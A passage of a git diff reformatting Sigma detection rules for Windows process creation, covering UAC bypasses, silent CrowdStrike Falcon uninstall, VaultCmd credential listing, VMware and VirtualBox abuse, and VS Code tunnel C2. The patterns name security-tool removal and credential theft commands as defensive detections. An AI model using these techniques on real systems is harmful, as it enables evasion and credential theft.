detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: C:\Windows \System32\ + NewProcessName|contains: C:\Windows \System32\ condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wmp.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wmp.yml index f569639f1..980f1ae8f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wmp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wmp.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using Windows Media Player - Process id: 0058b9e5-bcd7-40d4-9205-95ca5a16d7b2 status: test -description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll - (UACMe 32) +description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) @@ -20,14 +19,13 @@ detection: EventID: 4688 Channel: Security selection1: - NewProcessName: C:\Program Files\Windows Media Player\osk.exe + NewProcessName: C:\Program Files\Windows Media Player\osk.exe MandatoryLabel: - S-1-16-12288 - S-1-16-16384 selection2: - ParentCommandLine: '"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" - /s' - NewProcessName: C:\Windows\System32\cmd.exe + ParentCommandLine: '"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s' + NewProcessName: C:\Windows\System32\cmd.exe MandatoryLabel: - S-1-16-12288 - S-1-16-16384 diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wsreset.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wsreset.yml index 099c72524..36917a869 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wsreset.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wsreset.yml @@ -1,18 +1,16 @@ title: Bypass UAC via WSReset.exe id: d797268e-28a9-49a7-b9a8-2f5039011c5c related: - - id: bdc8918e-a1d5-49d1-9db7-ea0fd91aa2ae - type: obsoletes + - id: bdc8918e-a1d5-49d1-9db7-ea0fd91aa2ae + type: obsoletes status: test -description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries - use this technique to execute privileged processes. +description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes. references: - https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html - https://lolbas-project.github.io/lolbas/Binaries/Wsreset/ - https://www.activecyber.us/activelabs/windows-uac-bypass - https://twitter.com/ReaQta/status/1222548288731217921 -author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, - Florian Roth +author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth date: 2019/10/24 modified: 2022/05/13 tags: @@ -29,8 +27,8 @@ detection: selection: ParentProcessName|endswith: \wsreset.exe filter: - - NewProcessName|endswith: \conhost.exe - - OriginalFileName: CONHOST.EXE + - NewProcessName|endswith: \conhost.exe + - OriginalFileName: CONHOST.EXE condition: process_creation and (selection and not filter) falsepositives: - Unknown sub processes of Wsreset.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml index 4cf79382b..d5b8a5b8a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml @@ -21,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \wsreset.exe + NewProcessName|endswith: \wsreset.exe MandatoryLabel: - S-1-16-12288 - S-1-16-16384 diff --git a/sigma/builtin/process_creation/proc_creation_win_ultravnc_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_ultravnc_susp_execution.yml index a31d1a500..6359b2458 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ultravnc_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ultravnc_susp_execution.yml @@ -1,9 +1,7 @@ title: Suspicious UltraVNC Execution id: 871b9555-69ca-4993-99d3-35a59f9f3599 status: test -description: Detects suspicious UltraVNC command line flag combination that indicate - a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon - threat group) +description: Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group) references: - https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine @@ -24,7 +22,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - '-autoreconnect ' - '-connect ' - '-id:' diff --git a/sigma/builtin/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml b/sigma/builtin/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml index da5b55b23..b14f538c8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml @@ -1,8 +1,7 @@ title: Uninstall Crowdstrike Falcon Sensor id: f0f7be61-9cf5-43be-9836-99d6ef448a18 status: test -description: Adversaries may disable security tools to avoid possible detection of - their tools and activities by uninstalling Crowdstrike Falcon +description: Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md author: frack113 @@ -19,13 +18,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \WindowsSensor.exe - ' /uninstall' - ' /quiet' condition: process_creation and selection falsepositives: - - Administrator might leverage the same command line for debugging or other purposes. - However this action must be always investigated + - Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml index 953574070..0a54c217d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml @@ -1,11 +1,10 @@ title: Uncommon Userinit Child Process id: 0a98a10c-685d-4ab0-bddc-b6bdd1d48458 related: - - id: 21d856f9-9281-4ded-9377-51a1a6e2a432 - type: similar + - id: 21d856f9-9281-4ded-9377-51a1a6e2a432 + type: similar status: test -description: Detects uncommon "userinit.exe" child processes, which could be a sign - of uncommon shells or login scripts used for persistence. +description: Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence. references: - https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html - https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core @@ -25,31 +24,32 @@ detection: selection: ParentProcessName|endswith: \userinit.exe filter_main_explorer: - NewProcessName|endswith: :\WINDOWS\explorer.exe + NewProcessName|endswith: :\WINDOWS\explorer.exe filter_optional_logonscripts: - CommandLine|contains: + CommandLine|contains: - netlogon.bat - UsrLogon.cmd filter_optional_windows_core: - CommandLine: PowerShell.exe + # Note: This filter is mandatory on Windows Core machines as the default shell spawned by "userinit" is "powershell.exe". + # https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core + CommandLine: PowerShell.exe filter_optional_proquota: - NewProcessName|endswith: + NewProcessName|endswith: - :\Windows\System32\proquota.exe - :\Windows\SysWOW64\proquota.exe filter_optional_citrix: - NewProcessName|endswith: - - :\Program Files (x86)\Citrix\HDX\bin\cmstart.exe - - :\Program Files (x86)\Citrix\HDX\bin\icast.exe + NewProcessName|endswith: + # As reported by https://github.com/SigmaHQ/sigma/issues/4569 + - :\Program Files (x86)\Citrix\HDX\bin\cmstart.exe # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command + - :\Program Files (x86)\Citrix\HDX\bin\icast.exe # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command - :\Program Files (x86)\Citrix\System32\icast.exe - - :\Program Files\Citrix\HDX\bin\cmstart.exe - - :\Program Files\Citrix\HDX\bin\icast.exe + - :\Program Files\Citrix\HDX\bin\cmstart.exe # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command + - :\Program Files\Citrix\HDX\bin\icast.exe # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command - :\Program Files\Citrix\System32\icast.exe filter_optional_image_null: - NewProcessName: null - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + NewProcessName: + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Legitimate logon scripts or custom shells may trigger false positives. Apply - additional filters accordingly. + - Legitimate logon scripts or custom shells may trigger false positives. Apply additional filters accordingly. level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_vaultcmd_list_creds.yml b/sigma/builtin/process_creation/proc_creation_win_vaultcmd_list_creds.yml index 7c25c7bd9..c4545522d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_vaultcmd_list_creds.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vaultcmd_list_creds.yml @@ -1,8 +1,7 @@ title: Windows Credential Manager Access via VaultCmd id: 58f50261-c53b-4c88-bd12-1d71f12eda4c status: test -description: List credentials currently stored in Windows Credential Manager via the - native Windows utility vaultcmd.exe +description: List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd author: frack113 @@ -19,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \VaultCmd.exe - - OriginalFileName: VAULTCMD.EXE + - NewProcessName|endswith: \VaultCmd.exe + - OriginalFileName: VAULTCMD.EXE selection_cli: - CommandLine|contains: '/listcreds:' + CommandLine|contains: '/listcreds:' condition: process_creation and (all of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_verclsid_runs_com.yml b/sigma/builtin/process_creation/proc_creation_win_verclsid_runs_com.yml index 4d1f537b3..9676bb225 100644 --- a/sigma/builtin/process_creation/proc_creation_win_verclsid_runs_com.yml +++ b/sigma/builtin/process_creation/proc_creation_win_verclsid_runs_com.yml @@ -20,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \verclsid.exe - - OriginalFileName: verclsid.exe + - NewProcessName|endswith: \verclsid.exe + - OriginalFileName: verclsid.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /S - /C condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_virtualbox_execution.yml b/sigma/builtin/process_creation/proc_creation_win_virtualbox_execution.yml index ac4e257b9..25425d829 100644 --- a/sigma/builtin/process_creation/proc_creation_win_virtualbox_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_virtualbox_execution.yml @@ -1,9 +1,7 @@ title: Detect Virtualbox Driver Installation OR Starting Of VMs id: bab049ca-7471-4828-9024-38279a4c04da status: test -description: Adversaries can carry out malicious operations using a virtual instance - to avoid detection. This rule is built to detect the registration of the Virtualbox - driver or start of a Virtualbox VM. +description: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM. references: - https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/ - https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/ @@ -22,12 +20,12 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: + CommandLine|contains: - VBoxRT.dll,RTR3Init - VBoxC.dll - VBoxDrv.sys selection_2: - CommandLine|contains: + CommandLine|contains: - startvm - controlvm condition: process_creation and (1 of selection_*) @@ -37,7 +35,6 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - This may have false positives on hosts where Virtualbox is legitimately being - used for operations + - This may have false positives on hosts where Virtualbox is legitimately being used for operations level: low ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml b/sigma/builtin/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml index eff2d5a7f..8104fd239 100644 --- a/sigma/builtin/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml @@ -1,14 +1,10 @@ title: Suspicious VBoxDrvInst.exe Parameters id: b7b19cb6-9b32-4fc4-a108-73f19acfe262 status: test -description: 'Detect VBoxDrvInst.exe run with parameters allowing processing INF file. - +description: | + Detect VBoxDrvInst.exe run with parameters allowing processing INF file. This allows to create values in the registry and install drivers. - - For example one could use this technique to obtain persistence via modifying one - of Run or RunOnce registry keys - - ' + For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys references: - https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml - https://twitter.com/pabraeken/status/993497996179492864 @@ -26,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - driver - executeinf - NewProcessName|endswith: \VBoxDrvInst.exe + NewProcessName|endswith: \VBoxDrvInst.exe condition: process_creation and selection fields: - SubjectUserName @@ -37,7 +33,6 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation - process + - Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml b/sigma/builtin/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml index 8d91fdefc..b92a25eb6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml @@ -1,11 +1,10 @@ title: Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script id: 7aa4e81a-a65c-4e10-9f81-b200eb229d7d related: - - id: 236d8e89-ed95-4789-a982-36f4643738ba - type: derived + - id: 236d8e89-ed95-4789-a982-36f4643738ba + type: derived status: experimental -description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and - "set" flag to setup a specific script to run for a specific VM state +description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state references: - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/ - https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/ @@ -23,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \VMwareToolBoxCmd.exe - - OriginalFileName: toolbox-cmd.exe + - NewProcessName|endswith: \VMwareToolBoxCmd.exe + - OriginalFileName: toolbox-cmd.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' script ' - ' set ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml b/sigma/builtin/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml index 602589ac3..398024bf7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml @@ -1,12 +1,10 @@ title: Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script id: 236d8e89-ed95-4789-a982-36f4643738ba related: - - id: 7aa4e81a-a65c-4e10-9f81-b200eb229d7d - type: derived + - id: 7aa4e81a-a65c-4e10-9f81-b200eb229d7d + type: derived status: experimental -description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and - "set" flag to setup a specific script that's located in a potentially suspicious - location to run for a specific VM state +description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state references: - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/ author: Nasreddine Bencherchali (Nextron Systems) @@ -23,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection_bin_img: - - NewProcessName|endswith: \VMwareToolBoxCmd.exe - - OriginalFileName: toolbox-cmd.exe + - NewProcessName|endswith: \VMwareToolBoxCmd.exe + - OriginalFileName: toolbox-cmd.exe selection_bin_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' script ' - ' set ' selection_susp_paths: - CommandLine|contains: + CommandLine|contains: - :\PerfLogs\ - :\Temp\ - :\Windows\System32\Tasks\ diff --git a/sigma/builtin/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml index 8f75c3675..7fe0a6962 100644 --- a/sigma/builtin/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml @@ -1,8 +1,7 @@ title: VMToolsd Suspicious Child Process id: 5687f942-867b-4578-ade7-1e341c46e99a status: experimental -description: Detects suspicious child process creations of VMware Tools process which - may indicate persistence setup +description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup references: - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/ - https://user-images.githubusercontent.com/61026070/136518004-b68cce7d-f9b8-4e9a-9b7b-53b1568a9a94.png @@ -24,37 +23,37 @@ detection: selection_parent: ParentProcessName|endswith: \vmtoolsd.exe selection_img: - - NewProcessName|endswith: - - \cmd.exe - - \cscript.exe - - \mshta.exe - - \powershell.exe - - \pwsh.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - OriginalFileName: - - Cmd.Exe - - cscript.exe - - MSHTA.EXE - - PowerShell.EXE - - pwsh.dll - - REGSVR32.EXE - - RUNDLL32.EXE - - wscript.exe + - NewProcessName|endswith: + - \cmd.exe + - \cscript.exe + - \mshta.exe + - \powershell.exe + - \pwsh.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - OriginalFileName: + - Cmd.Exe + - cscript.exe + - MSHTA.EXE + - PowerShell.EXE + - pwsh.dll + - REGSVR32.EXE + - RUNDLL32.EXE + - wscript.exe filter_main_vmwaretools_script: - CommandLine|contains: + CommandLine|contains: - \VMware\VMware Tools\poweron-vm-default.bat - \VMware\VMware Tools\poweroff-vm-default.bat - \VMware\VMware Tools\resume-vm-default.bat - \VMware\VMware Tools\suspend-vm-default.bat - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe filter_main_empty: - CommandLine: '' - NewProcessName|endswith: \cmd.exe + CommandLine: '' + NewProcessName|endswith: \cmd.exe filter_main_null: - CommandLine: null - NewProcessName|endswith: \cmd.exe + CommandLine: + NewProcessName|endswith: \cmd.exe condition: process_creation and (all of selection* and not 1 of filter_main_*) falsepositives: - Legitimate use by VM administrator diff --git a/sigma/builtin/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml b/sigma/builtin/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml index 15b2e4422..f14841697 100644 --- a/sigma/builtin/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml @@ -1,9 +1,7 @@ title: Potentially Suspicious Child Process Of VsCode id: 5a3164f2-b373-4152-93cf-090b13c12d27 status: experimental -description: Detects uncommon or suspicious child processes spawning from a VsCode - "code.exe" process. This could indicate an attempt of persistence via VsCode tasks - or terminal profiles. +description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles. references: - https://twitter.com/nas_bench/status/1618021838407495681 - https://twitter.com/nas_bench/status/1618021415852335105 @@ -25,14 +23,14 @@ detection: selection_parent: ParentProcessName|endswith: \code.exe selection_children_images: - NewProcessName|endswith: + NewProcessName|endswith: - \calc.exe - \regsvr32.exe - \rundll32.exe - \cscript.exe - \wscript.exe selection_children_cli: - CommandLine|contains: + CommandLine|contains: - Invoke-Expressions - IEX - Invoke-Command @@ -42,19 +40,18 @@ detection: - regsvr32 - wscript - cscript - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe - \cmd.exe selection_children_paths: - NewProcessName|contains: + NewProcessName|contains: + # Add more suspicious locations - :\Users\Public\ - :\Windows\Temp\ - :\Temp\ condition: process_creation and (selection_parent and 1 of selection_children_*) falsepositives: - - In development environment where VsCode is used heavily. False positives may - occur when developers use task to compile or execute different types of code. - Remove or add processes accordingly + - In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_execution.yml b/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_execution.yml index eccd21be6..d02420007 100644 --- a/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_execution.yml @@ -1,8 +1,7 @@ title: Visual Studio Code Tunnel Execution id: 90d6bd71-dffb-4989-8d86-a827fedd6624 status: experimental -description: Detects Visual Studio Code tunnel execution. Attackers can abuse this - functionality to establish a C2 channel +description: Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel references: - https://ipfyx.fr/post/visual-studio-code-tunnel/ - https://badoption.eu/blog/2023/01/31/code_c2.html @@ -20,20 +19,20 @@ detection: EventID: 4688 Channel: Security selection_only_tunnel: - OriginalFileName: null - CommandLine|endswith: .exe tunnel + OriginalFileName: + CommandLine|endswith: .exe tunnel selection_tunnel_args: - CommandLine|contains|all: + CommandLine|contains|all: - .exe tunnel - '--name ' - --accept-server-license-terms selection_parent_tunnel: ParentCommandLine|endswith: ' tunnel' - CommandLine|contains|all: + CommandLine|contains|all: - '/d /c ' - \servers\Stable- - code-server.cmd - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe condition: process_creation and (1 of selection_*) falsepositives: - Legitimate use of Visual Studio Code tunnel diff --git a/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml b/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml index 60b471734..3769b8255 100644 --- a/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml @@ -1,9 +1,7 @@ title: Visual Studio Code Tunnel Shell Execution id: f4a623c2-4ef5-4c33-b811-0642f702c9f1 status: experimental -description: Detects the execution of a shell (powershell, bash, wsl...) via Visual - Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel - and execute arbitrary commands on the system. +description: Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system. references: - https://ipfyx.fr/post/visual-studio-code-tunnel/ - https://badoption.eu/blog/2023/01/31/code_c2.html @@ -21,16 +19,17 @@ detection: EventID: 4688 Channel: Security selection_parent: - ParentCommandLine|contains: .vscode-server + ParentCommandLine|contains: .vscode-server # Technically one can host its own local server instead of using the VsCode one. And that would probably change the name (requires further research) + # Note: Child processes (ie: shells) can be whatever technically (with some efforts) ParentProcessName|contains: \servers\Stable- ParentProcessName|endswith: \server\node.exe selection_child_1: - CommandLine|contains: \terminal\browser\media\shellIntegration.ps1 - NewProcessName|endswith: + CommandLine|contains: \terminal\browser\media\shellIntegration.ps1 + NewProcessName|endswith: - \powershell.exe - \pwsh.exe selection_child_2: - NewProcessName|endswith: + NewProcessName|endswith: - \wsl.exe - \bash.exe condition: process_creation and (selection_parent and 1 of selection_child_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml b/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml index bfa44f3ea..2dfa073ee 100644 --- a/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml @@ -1,8 +1,7 @@ title: Renamed Visual Studio Code Tunnel Execution id: 2cf29f11-e356-4f61-98c0-1bdb9393d6da status: experimental -description: Detects renamed Visual Studio Code tunnel execution. Attackers can abuse - this functionality to establish a C2 channel +description: Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel references: - https://ipfyx.fr/post/visual-studio-code-tunnel/ - https://badoption.eu/blog/2023/01/31/code_c2.html @@ -20,36 +19,35 @@ detection: EventID: 4688 Channel: Security selection_image_only_tunnel: - OriginalFileName: null - CommandLine|endswith: .exe tunnel + OriginalFileName: + CommandLine|endswith: .exe tunnel selection_image_tunnel_args: - CommandLine|contains|all: + CommandLine|contains|all: - .exe tunnel - '--name ' - --accept-server-license-terms selection_image_tunnel_service: - CommandLine|contains|all: + CommandLine|contains|all: - 'tunnel ' - service - internal-run - tunnel-service.log selection_parent_tunnel: ParentCommandLine|endswith: ' tunnel' - CommandLine|contains|all: + CommandLine|contains|all: - '/d /c ' - \servers\Stable- - code-server.cmd - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe filter_main_parent_code: ParentProcessName|endswith: - \code-tunnel.exe - \code.exe filter_main_image_code: - NewProcessName|endswith: + NewProcessName|endswith: - \code-tunnel.exe - \code.exe - condition: process_creation and ((1 of selection_image_* and not 1 of filter_main_image_*) - or (1 of selection_parent_* and not 1 of filter_main_parent_*)) + condition: process_creation and ((1 of selection_image_* and not 1 of filter_main_image_*) or (1 of selection_parent_* and not 1 of filter_main_parent_*)) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_service_install.yml b/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_service_install.yml index f5f9d6459..32fb23746 100644 --- a/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_service_install.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_service_install.yml @@ -19,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'tunnel ' - service - internal-run diff --git a/sigma/builtin/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml b/sigma/builtin/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml index 66d3b892d..3e1d94483 100644 --- a/sigma/builtin/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml @@ -1,8 +1,7 @@ title: Potential Binary Proxy Execution Via VSDiagnostics.EXE id: ac1c92b4-ac81-405a-9978-4604d78cc47e status: experimental -description: Detects execution of "VSDiagnostics.exe" with the "start" command in - order to launch and proxy arbitrary binaries. +description: Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries. references: - https://twitter.com/0xBoku/status/1679200664013135872 author: Nasreddine Bencherchali (Nextron Systems) @@ -18,12 +17,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \VSDiagnostics.exe - - OriginalFileName: VSDiagnostics.exe + - NewProcessName|endswith: \VSDiagnostics.exe + - OriginalFileName: VSDiagnostics.exe selection_cli_start: - CommandLine|contains: start + CommandLine|contains: start selection_cli_launch: - CommandLine|contains: + CommandLine|contains: - ' /launch:' - ' -launch:' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml b/sigma/builtin/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml index e8339cf15..2c4268eb0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml @@ -1,8 +1,7 @@ title: Suspicious Vsls-Agent Command With AgentExtensionPath Load id: 43103702-5886-11ed-9b6a-0242ac120002 status: test -description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with - a suspicious library load using the --agentExtensionPath parameter +description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter references: - https://twitter.com/bohops/status/1583916360404729857 author: bohops @@ -18,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: --agentExtensionPath - NewProcessName|endswith: \vsls-agent.exe + CommandLine|contains: --agentExtensionPath + NewProcessName|endswith: \vsls-agent.exe filter: - CommandLine|contains: Microsoft.VisualStudio.LiveShare.Agent. + CommandLine|contains: Microsoft.VisualStudio.LiveShare.Agent. condition: process_creation and (selection and not filter) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_w32tm.yml b/sigma/builtin/process_creation/proc_creation_win_w32tm.yml index a2cc8252d..8b0ad8ecd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_w32tm.yml +++ b/sigma/builtin/process_creation/proc_creation_win_w32tm.yml @@ -1,8 +1,7 @@ title: Use of W32tm as Timer id: 6da2c9f5-7c53-401b-aacb-92c040ce1215 status: test 